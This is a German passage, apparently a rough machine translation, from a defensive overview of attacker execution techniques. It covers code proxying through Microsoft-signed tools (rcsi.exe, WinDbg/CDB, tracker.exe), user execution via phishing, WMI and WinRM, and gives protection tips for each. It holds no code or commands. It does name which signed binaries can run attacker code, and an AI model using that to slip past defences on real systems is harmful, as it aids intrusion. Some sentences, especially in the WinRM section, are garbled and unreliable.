RCSI- Nicht interaktive Befehlszeilenschnittstelle für C #, ähnlich wie csi.exe. Es wurde in einer früheren Version der Roslyn .Net-Compilerplattform eingeführt. Rcsi.exe ist vom Microsoft Digital Certificate signiert. C # .csx-Skriptdateien können mit Rcsi.exe an der Windows-Eingabeaufforderung geschrieben und ausgeführt werden.
WinDbg / CDB ist der MS Windows-Kernel und ein Dienstprogramm zum Debuggen im Benutzermodus. Der Microsoft-Konsolen-Debugger cdb.exe ist auch ein Debugger im Benutzermodus. Beide Dienstprogramme können als eigenständige Tools verwendet werden. Wird häufig in der Softwareentwicklung und im Reverse Engineering verwendet und ist auf normalen Windows-Systemen nicht zu finden. Sowohl WinDbg.exe- als auch CDB.exe-Dateien sind vom Microsoft Digital Certificate signiert und können zum Proxy-Code verwendet werden.
Tracker- Dienstprogramm zur Verfolgung von Dateien auf tracker.exe. In .NET als Teil von MSBuild enthalten. Wird zum Registrieren von Aufrufen im Windows 10-Dateisystem verwendet. Angreifer können tracker.exe verwenden, um DLL in verschiedenen Prozessen auszuführen. Tracker.exe ist auch mit einem Microsoft-Zertifikat signiert.

Schutzempfehlungen: Alle oben genannten Dateien sollten aus dem System gelöscht werden, wenn sie von Benutzern nicht für den vorgesehenen Zweck verwendet werden.

Benutzerausführung

System: Windows, Linux, macOS
Rechte: Benutzer
Beschreibung: Angreifer können sich auf bestimmte Aktionen des Benutzers verlassen, um bestimmte Aktionen auszuführen. Dies kann eine direkte Codeausführung sein, wenn ein Benutzer eine schädliche ausführbare Datei öffnet, die als Phishing-Anhang mit einem Symbol und einer sichtbaren Dateierweiterung für Dokumente geliefert wird. Manchmal können andere Techniken verwendet werden, beispielsweise wenn ein Benutzer auf einen Link in einer Phishing-E-Mail klickt, was zur Ausnutzung einer Browser-Sicherheitsanfälligkeit führt. Die "Benutzerausführung" -Technik wird häufig in anderen Phasen der Invasion verwendet, beispielsweise wenn ein Angreifer eine Datei in einem freigegebenen Verzeichnis oder auf dem Desktop des Benutzers ablegt und hofft, dass er darauf "klickt".

Schutztipps : Sensibilisierung der Benutzer. Blockieren des Downloads von Dateien wie .scr, .exe, .pif, .cpl usw. Verwendung von Antivirensoftware und Implementierung von IPS-Systemen.

Windows Management Instrumentation (WMI)

System: Windows
Rechte: Benutzer, Administrator
Beschreibung: WMI ist ein Tool zur Verwaltung von Windows, das lokalen und Remotezugriff auf Windows-Systemkomponenten ermöglicht. WMI verwendet SMB und RPCS (läuft auf Port 135). Angreifer können WMI verwenden, um mit lokalen und Remote-Systemen zu interagieren und um viele taktische Operationen durchzuführen, z. B. das Sammeln von Informationen in der Phase der Ressourcenüberprüfung (Ermittlung) und die Ausführung von Remote-Dateien während der "wörtlichen Bewegung".

Schutzempfehlungen:Das Deaktivieren von WMI und RPCS kann zu Systeminstabilität führen. Standardmäßig können nur Administratoren über WMI eine Remoteverbindung zum System herstellen. Verhindern Sie das Duplizieren von Berechtigungen zwischen administrativen und anderen privilegierten Konten.

Windows-Remoteverwaltung (WinRM)

System: Windows
Rechte: Benutzer, Administrator
Beschreibung: Windows Remote Management (WinRM) ist der Name eines Dienstes und Protokolls, das die Interaktion von Remotebenutzern mit dem System ermöglicht (z. B. Starten einer Datei, Ändern der Registrierung, Ändern eines Dienstes. Verwenden Sie zum Starten den Befehl winrm und andere Programme, um zu starten ., wie Powershell -

Tipps Schutz: Deaktivieren sie den WinRM - Dienst , wenn es notwendig, zu isolieren Infrastruktur WinRM mit separaten Konten und die Erlaubnis sollte .. sein ist WinRM Empfehlungen zur Einrichtung von Authentifizierungsmethoden und Verwendung randmauerov Host nur mit bestimmten Geräten Zugriff auf WinRM zu ermöglichen.